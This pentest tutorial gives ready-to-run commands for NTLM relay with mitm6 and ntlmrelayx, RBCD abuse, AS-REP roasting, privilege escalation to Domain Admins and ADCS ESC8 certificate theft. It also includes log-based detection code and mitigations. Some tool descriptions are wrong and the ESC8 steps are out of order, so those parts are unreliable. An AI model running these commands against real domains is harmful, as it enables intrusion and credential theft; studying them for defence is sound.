Insider Insights: Strategies For Initial Access In An Internal Pentest Part 2

Introduction

In our Initial Access In An Internal Pentest Part 1, we shared six ways to gain a foothold in internal penetration testing using the NTLM Relay technique in combination with Responder and impacket-ntlmrelayx. This blog post continues with new tactics and techniques, such as coercion and the abuse of protocols and features including IPv6, LDAP, Resource-Based Constrained Delegation (RBCD), and Active Directory Certificate Services (ADCS). These techniques can be used to obtain either domain admin privileges or initial access.

The following four techniques and procedures demonstrate how to gain a foothold.

Mitm6 is a tool that enables attackers to intercept, read, modify, and inject packets into IPv6 communication channels. It exploits IPv6’s Neighbor Discovery Protocol (NDP) and ICMPv6 messages to perform attacks. Attackers can use Mitm6 to test the security of IPv6 networks, identify vulnerabilities, and perform various attacks such as eavesdropping, injecting malicious packets, or performing a DoS attack. To use Mitm6, attackers set up a rogue router or access point, configure Mitm6 to listen for NDP messages, and then intercept packets to analyze, modify, or inject new ones.

Mitm6 is a crucial tool for internal penetration testing because it enables the tester to intercept and manipulate encrypted and secure traffic. With Mitm6, we can access sensitive data, including user credentials, session tokens, and other confidential information. Moreover, this tool can inject malicious code into network traffic, allowing the tester to exploit application and service vulnerabilities.

Attack 1: Domain Information Dumping

Prerequisite steps to perform this attack:

  • The IPv6 protocol MUST be enabled: Fortunately, the IPv6 protocol is enabled by default in all modern Windows systems, including Windows 10 and Windows Server 2016 and later.
  • Since Windows servers have SMB signing enabled by default, we will relay to the LDAP protocol instead.
  • Mitm6 and ntlmrelayx: In order to execute the attack, we will have to execute the below commands:
mitm6 -d hydra.marvel.local -i eth1
/usr/local/bin/ntlmrelayx.py -t ldaps://192.168.115.140 -wh wpad

As shown in the image, the wkstn-1_HYDRA.MARVEL.local workstation (192.168.115.142) triggered an authentication request, and impacket-ntlmrelayx relayed the credentials of the computer account HYDRA/WKSTN-1$ to DC2.HYDRA.MARVEL.local (192.168.115.140) and dumped the domain information from DC2.

The tool ntlmrelayx.py authenticated to the domain controller DC2.HYDRA.MARVEL.local over the LDAP protocol and dumped the domain information, including users, computers, groups, policies, and trusts, into the lootdir directory.
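One way a defender can spot the relayed machine-account logon described above: on the domain controller, a relayed WKSTN-1$ authentication is an NTLM network logon (event 4624, logon type 3) whose source address is the relay host rather than the workstation's own address. The following is an added example, not code from the original post; the inventory, the event records and the 192.168.115.138 relay address are constructed sample data.

```python
from typing import Dict, List

# Constructed inventory: machine account -> the address that host is expected to use.
INVENTORY: Dict[str, str] = {
    "WKSTN-1$": "192.168.115.142",
    "DC2$": "192.168.115.140",
}

# Constructed Windows Security event 4624 records, keyed by the log's own field names.
EVENTS: List[Dict[str, str]] = [
    {"EventID": "4624", "LogonType": "3", "AuthenticationPackageName": "NTLM",
     "TargetUserName": "WKSTN-1$", "IpAddress": "192.168.115.142"},  # normal
    {"EventID": "4624", "LogonType": "3", "AuthenticationPackageName": "NTLM",
     "TargetUserName": "WKSTN-1$", "IpAddress": "192.168.115.138"},  # relayed
    {"EventID": "4624", "LogonType": "3", "AuthenticationPackageName": "Kerberos",
     "TargetUserName": "WKSTN-1$", "IpAddress": "192.168.115.138"},  # not NTLM
    {"EventID": "4624", "LogonType": "2", "AuthenticationPackageName": "NTLM",
     "TargetUserName": "hulk", "IpAddress": "127.0.0.1"},            # user, console
]


def is_machine_account(name: str) -> bool:
    """Computer accounts in Active Directory end with a dollar sign."""
    return name.endswith("$")


def find_relayed_logons(events: List[Dict[str, str]],
                        inventory: Dict[str, str]) -> List[Dict[str, str]]:
    """Return 4624 events that look like relayed machine-account NTLM logons."""
    hits = []
    for ev in events:
        if ev.get("EventID") != "4624" or ev.get("LogonType") != "3":
            continue                           # a relay produces network logons
        if ev.get("AuthenticationPackageName") != "NTLM":
            continue                           # NTLM relay needs NTLM
        account = ev.get("TargetUserName", "")
        if not is_machine_account(account):
            continue                           # this rule covers machine accounts
        expected = inventory.get(account)
        if expected is None or ev.get("IpAddress") != expected:
            hits.append(ev)                    # unknown machine or wrong address
    return hits


if __name__ == "__main__":
    for hit in find_relayed_logons(EVENTS, INVENTORY):
        print("possible relay:", hit["TargetUserName"], "from", hit["IpAddress"])
```

The same mismatch rule flags the newly created computer account of Attack 2, because it has no inventory entry at all.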

Attack 2: IPv6 Spoofing & RBCD & NTLM Relay

Resource-Based Constrained Delegation (RBCD) was introduced in Windows Server 2012 to enable constrained delegation across domains. It is a safer way to allow services to act on behalf of other users, and these more secure delegation mechanisms can be hardened further to defend against attacks.

In Resource-Based Constrained Delegation (RBCD), the list of services that can access a target service as another user is stored in Active Directory on the target service's own object, in its msDS-AllowedToActOnBehalfOfOtherIdentity attribute.

Mitm6 and ntlmrelayx: In order to execute the attack, we will have to execute the below commands:

impacket-ntlmrelayx -t ldaps://192.168.115.140 -wh wpad --delegate-access --add-computer initialaccess 'Passw0rd@12345'
mitm6 -d hydra.marvel.local -i eth1
OPTIONAL:
impacket-ntlmrelayx -t ldaps://192.168.115.140 -wh wpad --delegate-access

As shown in the image, the wkstn-1_HYDRA.MARVEL.local workstation (192.168.115.142) attempted to access an SMB share. During this attempt, impacket-ntlmrelayx used the credentials of the computer account HYDRA/WKSTN-1$ to gain access to DC2.HYDRA.MARVEL.local (192.168.115.140) through the LDAP(s) protocol. A new computer called "initialaccess" was created with the password "Passw0rd@12345", and the delegation rights for the newly created computer, "initialaccess$", were modified. This means that the "initialaccess$" computer can impersonate users on WKSTN-1$ via the S4U2Proxy technique.

The next step is to request the local administrator Ticket Granting Ticket (TGT) using the impacket-getST tool, which will use the S4U2Proxy technique by executing the below command:

impacket-getST -spn 'cifs/wkstn-1.hydra.marvel.local' -impersonate administrator -dc-ip 192.168.115.140 'HYDRA'/'initialaccess$':'Passw0rd@12345'

Once the TGT is obtained, we can use the impacket-secretsdump tool to dump the SAM database from the wkstn-1.hydra.marvel.local computer.
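The RBCD abuse above leaves two audit events on the domain controller: 4741 (computer account created) by the relayed WKSTN-1$ identity, followed seconds later by 5136 (directory object modified) writing msDS-AllowedToActOnBehalfOfOtherIdentity on WKSTN-1's own object. The following correlation is an added example, not code from the original post; it assumes "Audit Directory Service Changes" is on with a SACL on computer objects, and the event records are constructed sample data.

```python
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"
WINDOW = timedelta(minutes=10)   # 4741 followed by 5136 inside this window

# Constructed sample events (field names as Windows logs them).
EVENTS: List[Dict[str, str]] = [
    {"EventID": "4741", "TimeCreated": "2024-01-10T09:00:00",
     "SubjectUserName": "WKSTN-1$", "TargetUserName": "initialaccess$"},
    {"EventID": "5136", "TimeCreated": "2024-01-10T09:00:03",
     "SubjectUserName": "WKSTN-1$",
     "ObjectDN": "CN=WKSTN-1,CN=Computers,DC=hydra,DC=marvel,DC=local",
     "AttributeLDAPDisplayName": RBCD_ATTR},
    {"EventID": "5136", "TimeCreated": "2024-01-10T11:00:00",
     "SubjectUserName": "svc_admin",
     "ObjectDN": "CN=WEB-1,CN=Computers,DC=hydra,DC=marvel,DC=local",
     "AttributeLDAPDisplayName": "servicePrincipalName"},
]


def _when(ev: Dict[str, str]) -> datetime:
    return datetime.fromisoformat(ev["TimeCreated"])


def _is_self_write(subject: str, object_dn: str) -> bool:
    """True when a machine account edits its own computer object."""
    if not subject.endswith("$"):
        return False
    return object_dn.upper().startswith("CN=" + subject[:-1].upper() + ",")


def rbcd_alerts(events: List[Dict[str, str]]) -> List[Tuple[str, Dict[str, str]]]:
    """Return (severity, event) for every write to the RBCD attribute."""
    created: Dict[str, List[datetime]] = {}   # subject -> times it created computers
    for ev in events:
        if ev["EventID"] == "4741":
            created.setdefault(ev["SubjectUserName"], []).append(_when(ev))
    alerts = []
    for ev in events:
        if ev["EventID"] != "5136" or ev.get("AttributeLDAPDisplayName") != RBCD_ATTR:
            continue
        subject = ev["SubjectUserName"]
        severity = "medium"                    # any RBCD write deserves review
        if _is_self_write(subject, ev["ObjectDN"]):
            severity = "high"                  # relayed identity writing itself
        if any(abs(_when(ev) - t) <= WINDOW for t in created.get(subject, [])):
            severity = "high"                  # fresh computer + delegation edit
        alerts.append((severity, ev))
    return alerts
```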

Attack 3: AS-REP Roasting & Escalate User

Prerequisites to perform this attack:

  • An account vulnerable to AS-REP Roasting, with a weak or guessable password.
  • A high-privilege victim account whose authentication can be relayed with impacket-ntlmrelayx.

AS-REP Roasting is a technique that enables adversaries to steal the password hashes of user accounts that have Kerberos pre-authentication disabled, which they can then attempt to crack offline.

When pre-authentication is turned on, a user who wants to access a resource starts the Kerberos authentication process by sending an Authentication Server Request (AS-REQ) to the domain controller (DC). The timestamp on this message is encrypted with the hash of the user’s password. If the DC can decrypt the timestamp using its record of the user’s password hash, it will respond with an Authentication Server Response (AS-REP) message. This message includes a Ticket Granting Ticket (TGT) issued by the Key Distribution Center (KDC), which is used for future user access requests.

However, if pre-authentication is turned off, an attacker can request authentication data for any user. The Domain Controller would respond with an AS-REP message. Since part of this message is encrypted using the user’s password, the attacker can then try to guess the user’s password using a brute-force attack.

The first step is to identify valid domain accounts; this can be done using Kerbrute, a tool designed to quickly enumerate existing accounts and brute-force valid Active Directory accounts through Kerberos pre-authentication. It is designed to be used on an internal Windows domain with access to one of the Domain Controllers.

This can be done by executing the below command.

kerbrute userenum -d hydra.marvel.local /root/MARVEL.local/Kerberos/user.txt --dc 192.168.115.140

Once an existing domain account is obtained, we can easily perform AS-REP Roasting using GetNPUsers. Simply issue the following command:

impacket-GetNPUsers -dc-ip 192.168.115.140 -usersfile ./users.txt hydra.marvel.local/

This will automatically use the accounts in the text file that do not require pre-authentication and extract their AS-REP hashes for offline cracking. In this blog, we used John the Ripper to recover the credential material, as shown in the image below:
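Both steps above leave traces in event 4768 (Kerberos TGT requested) on the domain controller: a wordlist run produces a burst of failures with status 0x6 (client principal unknown) from one address, and a roastable account yields a successful 4768 with Pre-Authentication Type 0, usually with RC4 (0x17) because that is what the roasting tool asks for. The following checks are an added example, not code from the original post; the thresholds and the event records are constructed sample data.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Set, Tuple

ENUM_THRESHOLD = 5                 # distinct unknown names from one source
ENUM_WINDOW = timedelta(minutes=2)


def make_event(t: str, user: str, ip: str, status: str,
               preauth: str = "2", etype: str = "0x12") -> Dict[str, str]:
    """Build a constructed 4768 record with the log's own field names."""
    return {"EventID": "4768", "TimeCreated": t, "TargetUserName": user,
            "IpAddress": ip, "Status": status, "PreAuthType": preauth,
            "TicketEncryptionType": etype}


# Constructed sample: a wordlist run from .138, then a no-pre-auth TGT for hulk.
EVENTS = [make_event("2024-01-10T09:00:%02d" % i, "user%d" % i,
                     "192.168.115.138", "0x6") for i in range(6)]
EVENTS += [make_event("2024-01-10T09:05:00", "hulk", "192.168.115.138",
                      "0x0", preauth="0", etype="0x17"),
           make_event("2024-01-10T09:06:00", "bbarnes", "192.168.115.142", "0x0")]


def enumeration_sources(events: List[Dict[str, str]], threshold: int = ENUM_THRESHOLD,
                        window: timedelta = ENUM_WINDOW) -> Set[str]:
    """Addresses that asked for >= threshold unknown principals within window."""
    by_ip: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    for e in events:
        if e["EventID"] == "4768" and e["Status"] == "0x6":   # principal unknown
            by_ip[e["IpAddress"]].append(
                (datetime.fromisoformat(e["TimeCreated"]), e["TargetUserName"]))
    flagged = set()
    for ip, items in by_ip.items():
        items.sort()
        for i, (start, _) in enumerate(items):
            names = {n for t, n in items[i:] if t - start <= window}
            if len(names) >= threshold:
                flagged.add(ip)
                break
    return flagged


def asrep_roast_candidates(events: List[Dict[str, str]]) -> List[Tuple[str, str, bool]]:
    """Successful TGT requests without pre-auth; the bool marks RC4 (0x17)."""
    return [(e["TargetUserName"], e["IpAddress"], e["TicketEncryptionType"] == "0x17")
            for e in events
            if e["EventID"] == "4768" and e["Status"] == "0x0"
            and e["PreAuthType"] == "0"]
```

Accounts that legitimately have pre-authentication disabled also show PreAuthType 0, so the second check is best paired with a review of why the flag is set on each account it reports.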

After obtaining the password of the Hulk user account (credential material), we set up Responder with its HTTP and SMB servers disabled and wait for an administrator connection, so that impacket-ntlmrelayx can use the --escalate-user parameter to add the Hulk user to the Domain Admins group. Use the following commands to achieve this:

responder -I eth1 -v
impacket-ntlmrelayx -t ldaps://192.168.115.140 -wh wpad --escalate-user hulk

The image shows that the domain admin account HYDRA/BBARNES attempted to access an SMB share. During this attempt, impacket-ntlmrelayx relayed the authentication to DC2.HYDRA.MARVEL.local (192.168.115.140) through the LDAP(s) protocol and modified HULK's privileges by adding the account to the Domain Admins group. This means that the "HULK" account obtained domain admin privileges over the HYDRA.MARVEL domain.

Once the escalate-user attack has succeeded, we can confirm that the Hulk user was added to the Domain Admins group using either the netexec or the impacket-psexec tool. Simply issue the following commands:

netexec smb 192.168.115.140 -u hulk -p 'P@ssw0rd'
impacket-psexec hydra/hulk:'P@ssw0rd'@dc2.hydra.marvel.local

Since we now have domain admin credentials, various post-exploitation attacks can be performed with other tools, including the scripts in the Impacket toolkit, such as:

  • impacket-smbexec
  • impacket-secretsdump
  • evil-winrm
  • impacket-smbclient
  • Metasploit
  • Netexec & Empire

Attack 4: NTLM Relay Attacks & Abusing Active Directory Certificate Services (AD CS – ESC8)

It’s important to note that the ESC8 technique does not exploit certificate template misconfigurations. Rather, it takes advantage of the configuration of the Certificate Authority (CA) server.

An Active Directory Certificate Authority that is susceptible to ESC8 must meet the following prerequisites:

  • Web Enrollment should be enabled.
  • Request Disposition should be set to issue.

The above image shows that the Web Enrollment service is enabled and accepts NTLM authentication without Secure Sockets Layer (SSL).

In this post, we will walk through the exploitation of the Web Enrollment feature. Active Directory Certificate Services (ADCS) supports HTTP-based enrollment methods. If enabled, HTTP-based certificate enrollment interfaces can be vulnerable to NTLM relay attacks. If an attacker can coerce a victim account to authenticate to the attacker-controlled machine, the credential material can be relayed to the Certificate Authority to request a certificate on behalf of the victim.

In some cases, a relay attack may not even require domain credentials. For example, if the victim host is not patched against CVE-2021-36942, an attacker on the network could trick the victim machine into authenticating to the attacker host by abusing the vulnerable API method OpenEncryptedFileRaw through the LSARPC (Local Security Authority Remote Protocol) interface.

Coerced authentication is a technique used by attackers to gain access to a user's account or information without the user's knowledge or consent. This technique is often achieved through various methods, such as phishing, social engineering, or brute-force attacks. Printerbug, PetitPotam, DFSCoerce, and Coercer are the most popular coercion tools for executing this technique in internal penetration testing. In this blog, we executed coercion using PetitPotam and impacket-ntlmrelayx without credentials against the domain controller DC4.SHIELD.local.

NOTE: If we do not specify a template name, Certipy will attempt to issue a certificate using the Machine and User templates. These are default templates, but that does not mean they will be available in your target environment or apply to your victim account. In this blog, we use the DomainController template, since we will coerce the DC4.SHIELD.local computer account to authenticate using PetitPotam without any credentials.

We can configure PetitPotam to coerce the authentication and Certipy to relay the coerced credential to the ADCS HTTP endpoint, requesting a certificate on behalf of DC4.SHIELD.local, using the following commands:

python ./PetitPotam.py 192.168.115.138 192.168.115.180
certipy relay -target csa.shield.local -template 'DomainController'
certipy auth -pfx dc4.pfx

Once the hash (dc4$) or the TGT .ccache file is obtained, we can easily dump the hashes from the Domain Controller called DC4.SHIELD.local. Simply execute the following command:

impacket-secretsdump dc4$@192.168.115.180 -hashes aad3b435b51404eeaad3b435b51404ee:64704821a851393bfc6f3f503fbXXXXX

Once we have set up and launched the impacket-ntlmrelayx and PetitPotam tools, we need to wait for the connection and grab the DC4$ certificate.

Once we have the certificate saved in a file, we can use the gettgtpkinit tool to request a TGT in .ccache file format; its path is exported in the KRB5CCNAME environment variable so that impacket-secretsdump can use it. Issue the following commands:

nano cert.txt
export KRB5CCNAME=dc4.ccache
impacket-secretsdump shield.local/dc4\$@dc4.shield.local -k -no-pass

We must turn off Responder's SMB and HTTP servers by editing the following configuration file with an editor like Nano or Vim:

vim /etc/responder/Responder.conf

Once we have set up and launched the impacket-ntlmrelayx and Responder tools, we need to wait for the connection and grab the Administrator certificate.

Once the .ccache file (credential material) has been obtained, we can start the post-exploitation phase and dump the user’s hashes using the impacket-secretsdump tool, as shown below.

As an alternative, we can use the Coercer tool instead of PetitPotam to coerce the authentication, and impacket-ntlmrelayx to relay the coerced credential to the ADCS HTTP endpoint, requesting a certificate on behalf of DC4.SHIELD.local, using the following commands:

impacket-ntlmrelayx -t http://192.168.115.144/certsrv/certfnsh.asp -smb2 --adcs --template 'DomainController'
coercer coerce -d shield.local -l 192.168.115.138 -t 192.168.115.180

Once we have the certificate, we can either use the gettgtpkinit.py tool to get the TGT or Certipy to get the NTLM hash.

nano cert.txt
python /opt/PKINITtools/gettgtpkinit.py shield.local/DC4\$ -pfx-base64 $(cat cert.txt) dc4.ccache
certipy relay -target csa.shield.local -template 'DomainController'
certipy auth -pfx dc4.pfx
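The relay above ends as an authenticated POST to /certsrv/certfnsh.asp on the CA, so the CA's own IIS log records a machine account (SHIELD\DC4$) enrolling over port 80 from the relay host rather than from the domain controller's address. The following W3C log scan is an added example, not code from the original post; the log lines, the inventory and the addresses are constructed sample data.

```python
from typing import Dict, List, Tuple

INVENTORY = {r"SHIELD\DC4$": "192.168.115.180"}   # constructed: account -> own IP

# Constructed IIS W3C extended log excerpt; a 401 is the NTLM challenge,
# a 200 with a username is a completed, authenticated request.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status
2024-01-10 09:00:01 192.168.115.144 POST /certsrv/certfnsh.asp - 80 - 192.168.115.138 401
2024-01-10 09:00:01 192.168.115.144 POST /certsrv/certfnsh.asp - 80 SHIELD\\DC4$ 192.168.115.138 200
2024-01-10 09:30:00 192.168.115.144 GET /certsrv/certrqxt.asp - 443 SHIELD\\jdoe 192.168.115.50 200
2024-01-10 10:00:00 192.168.115.144 POST /certsrv/certfnsh.asp - 443 SHIELD\\DC4$ 192.168.115.180 200
"""


def parse_w3c(text: str) -> List[Dict[str, str]]:
    """Turn W3C extended log text into dicts keyed by the #Fields names."""
    fields: List[str] = []
    rows = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            rows.append(dict(zip(fields, line.split())))
    return rows


def suspicious_enrollments(rows: List[Dict[str, str]],
                           inventory: Dict[str, str]) -> List[Tuple[str, str, List[str]]]:
    """Completed certfnsh.asp submissions that show the ESC8 pattern."""
    findings = []
    for r in rows:
        if r.get("cs-uri-stem", "").lower() != "/certsrv/certfnsh.asp":
            continue
        if r.get("sc-status") != "200" or r.get("cs-username", "-") == "-":
            continue                       # only completed, authenticated submissions
        user = r["cs-username"]
        reasons = []
        if r.get("s-port") == "80":
            reasons.append("plain HTTP enrollment")   # the channel ESC8 relies on
        if user.endswith("$") and inventory.get(user) != r.get("c-ip"):
            reasons.append("machine account from foreign address")
        if reasons:
            findings.append((user, r["c-ip"], reasons))
    return findings
```

The "plain HTTP" reason disappears once the endpoint is HTTPS-only with EPA enabled, which is the mitigation the conclusion lists for this attack.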

Conclusion

As noted earlier, most organizations cannot disable these protocols entirely because other technologies in their environments still depend on them. Instead, organizations need to manage the risk. While the risk cannot be eliminated, the recommendations below help mitigate Pass-the-Hash, SMB spoofing, LDAP relay, ticket abuse, and NTLM relay attacks.

  • Disable LLMNR/NBT-NS if possible, preventing an attacker from poisoning LLMNR/NBT-NS.
  • Turn on Extended Protection for Authentication (EPA).
  • For services that permit NTLM authentication, ensure that EPA is enabled and SMB signing is required.
  • Implement the Microsoft Active Directory tier model. Such a model significantly mitigates credential theft techniques such as Pass-the-Hash and Pass-the-Ticket, which underlie the majority of today's security breaches.
  • Microsoft released guidance on how to protect against the PetitPotam NTLM relay attack here.
  • Disable ADCS HTTP endpoints if they are not necessary.
  • Disable NTLM authentication, if possible.
  • Enforce HTTPS and enable Extended Protection for Authentication.
  • Require SMB and LDAP signing.
  • Enforce LDAP channel binding.

Credits & References

Authors

  • Red Team Lead

    As a computer security expert with over 15 years of experience, he specializes in various areas such as web applications, cloud computing (AWS, Azure & GCP), infrastructure penetration testing, red & purple team assessments, vulnerability analysis, exploit development, and malware analysis. He has conducted numerous successful black- and grey-box penetration testing and adversary emulation engagements throughout his career. He has demonstrated expertise in testing SOAP and RESTful web API services, thick clients, wireless networks, internal/external assessments, SAP ERP servers, ATMs, Tactics, Techniques and Procedures (TTPs), and forensics.

  • Chanel Carr

    Professional multi-cloud security architect, covering Amazon Web Services (AWS), Microsoft Azure, and Google GCP, with experience evaluating and testing computer security systems, creating firewalls, and improving network security to further protect systems.

  • Asif Khan

    Highly skilled Pentester with experience in various areas, including multi-clouds (AWS, Azure, and GCP), network, web applications, APIs, and mobile penetration testing. In addition, he is passionate about conducting Red and Purple Team assessments and developing innovative solutions to protect company systems and data.
